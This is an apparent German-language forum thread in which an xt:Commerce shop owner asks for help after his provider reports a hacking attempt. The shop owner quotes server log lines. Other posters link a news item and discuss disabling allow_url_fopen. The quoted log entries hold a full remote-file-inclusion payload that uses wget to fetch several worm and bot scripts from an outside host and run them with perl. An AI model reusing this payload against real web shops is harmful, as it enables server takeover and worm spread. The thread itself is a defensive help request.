Ich Hab Da Ein Problem

[stp69]

Ich habe gestern eine Mail von meinem Provider bekommen, ist nen sehr netter Typ , mit den freundlichen aber bestimmten Hinweis, doch mal die Shopsoftware zu upgraden. In der Mail befand ?sich ein Auszug aus der Server-Logdatei. Der Provider sprach davon das wohl jemand versuchte meinen bescheidenen Shop zu "hacken" .

Nun ich hab da leider nicht die Ahnung und hoffe hier auf Hilfe. in den Folgenden Zeilen einmal ein kleiner Auszug aus ?der Serverlog:

66.221.218.25 - - [25/Dec/2004:17:36:55 +0100] "GET /cmd/product_info.php/products_id/1622 HTTP/1.0" 200 39627 "-" "lwp-trivial/1.34"

66.221.218.25 - - [25/Dec/2004:17:37:02 +0100] "GET /cmd/product_info.php/products_id/1622/?XTCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.0" 200 38233 "-" "LWP::Simple/5.53"

66.221.218.25 - - [25/Dec/2004:17:37:05 +0100] "GET /cmd/product_info.php/products_id/1622/index.php?XTCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.0" 200 38234 "-" "LWP::Simple/5.53"

66.221.218.25 - - [25/Dec/2004:17:37:07 +0100] "GET /cmd/product_info.php/products_id/1622/shop_content.php?coID=7&XTCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.0" 200 38225 "-" "LWP::Simple/5.53"

66.221.218.25 - - [25/Dec/2004:17:37:14 +0100] "GET /cmd/product_info.php/products_id/1622/shop_content.php?coID=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.0" 200 38613 "-" "LWP::Simple/5.53" 

Ich stolpere h?ufig ?ber visualcoders.net. Habe in meinen Shop jedoch keine Verweise auf diese seltsame Seite.

Verwundert bin ich auch ?ber die seltsame XTCsid....

Kann mir da jemand helfen? Wer weis was hier abgeht?

Gru?

Stephan

[stp69]

hab da was gefunden:

http://www.heise.de/newsticker/meldung/54623

Ich mach erst mal zu... Inventur oder so

Mario, gibt es eventuel Schwachstellen im Shop die den Wurm reinlassen?

[Guest HHGAG]

Gestern haben zwei Angriffe auf den xt:C hosting Servern bei zwei Kunden stattgefunden, einmal v2 und einmal v3 beide haben die Angriffe ?berstanden, denke mal das wir safe sind =)

[stp69]

Moin,

lt heise.de soll das abschalten der Option allow_url_fopen Sicherheit bringen. Wird diese Funktion bei XT-C genutzt?

Gru?

Stephan